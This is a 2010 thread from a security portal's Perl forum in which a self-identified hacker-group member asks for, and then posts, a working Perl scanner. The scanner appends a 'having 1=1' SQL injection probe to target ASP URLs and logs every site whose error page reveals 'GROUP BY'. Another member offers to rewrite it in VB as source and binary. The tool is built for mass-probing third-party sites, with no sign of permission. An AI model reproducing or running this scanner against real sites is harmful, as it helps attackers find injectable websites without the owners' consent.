Waraxe IT Security Portal
Login or Register
July 27, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 224
Members: 0
Total: 224
Full disclosure
CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Perl -> can someone write that?
Post new topicReply to topic View previous topic :: View next topic
can someone write that?
PostPosted: Tue Dec 07, 2010 3:03 am Reply with quote
pink_spider
Advanced user
Advanced user
Joined: Aug 28, 2010
Posts: 91




Hello everybody.
Well, I was thinking of writing a perl script to analyze a list of sites in a *. txt. then implement some data.

Code:
example: 'having 1=1"


Code:
list = www.site1.com/news.asp?=1


Code:
program = www.site1.com/news.asp?=1 having 1=1


and the program would read the page and look for the word "Group by" on the page.

if the page is found vulneralvel the UNCLOSED QUOTATION.

can someone write that?

HELP ME :d

Thank's
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Tue Dec 07, 2010 7:37 pm Reply with quote
pink_spider
Advanced user
Advanced user
Joined: Aug 28, 2010
Posts: 91




Code:
#!/usr/bin/perl
# Sophia Hacker Group cr3w 2009-2010
# Hackers de Sergipe
# Pink_spider79@hotmail.com
# pink_spider tools

use LWP::Simple;

system("Title Asp injection scanner v1.0 by Pink_spider - priv8");
system("cls");
print "\nScanner Asp Injection versao 1.0 by Pink_spider\n";

if(!$ARGV[0]){
print "Modo de uso: perl $0 www.site.com\n";
exit;
}
$site = $ARGV[0];
if($site !~/http/) { $site = 'http://' . $site; }

print "Scaneando $site ... aguarde\n";

$url = "%20having%201=1";

$site = $site . $url;

$resultado = get($site);

if($resultado =~ /GROUP BY/)
{
print "vul: $site\n";

open(a,">>resultados.txt");
print a "$site\n";
close(a);
}
else{
print "o site testado na esta vul\n";
}
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Tue Dec 07, 2010 7:38 pm Reply with quote
pink_spider
Advanced user
Advanced user
Joined: Aug 28, 2010
Posts: 91




any can write it script perl in vb ?
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Tue Dec 07, 2010 8:00 pm Reply with quote
vince213333
Advanced user
Advanced user
Joined: Aug 03, 2009
Posts: 737
Location: Belgium




I would do it if I wouldn't have this assignment for school :/ But if you know any VB, it's not that hard, give it a try Wink

edit: ok i'm giving it a go Wink


Last edited by vince213333 on Tue Dec 07, 2010 8:15 pm; edited 1 time in total
View user's profile Send private message
PostPosted: Tue Dec 07, 2010 8:07 pm Reply with quote
pink_spider
Advanced user
Advanced user
Joined: Aug 28, 2010
Posts: 91




I managed to write in perl the writings.
more wanted something similar in vb
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Tue Dec 07, 2010 8:16 pm Reply with quote
vince213333
Advanced user
Advanced user
Joined: Aug 03, 2009
Posts: 737
Location: Belgium




Might be ready soon, ain't got time tomorrow so otherwise you'll have it in 2 days. Want source or binary?
View user's profile Send private message
PostPosted: Tue Dec 07, 2010 8:26 pm Reply with quote
pink_spider
Advanced user
Advanced user
Joined: Aug 28, 2010
Posts: 91




wanted the two if possible.
to study the source code.
and the binary to use.

thank's: D
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Thu Dec 09, 2010 7:28 pm Reply with quote
vince213333
Advanced user
Advanced user
Joined: Aug 03, 2009
Posts: 737
Location: Belgium




Program's ready Smile Try and catch me on msn. I've figured out why that one page isn't showing as vuln :/
View user's profile Send private message
PostPosted: Sun Dec 12, 2010 2:57 am Reply with quote
pink_spider
Advanced user
Advanced user
Joined: Aug 28, 2010
Posts: 91




thank very much ! Laughing
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
can someone write that?
www.waraxe.us Forum Index -> Perl
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.130 Seconds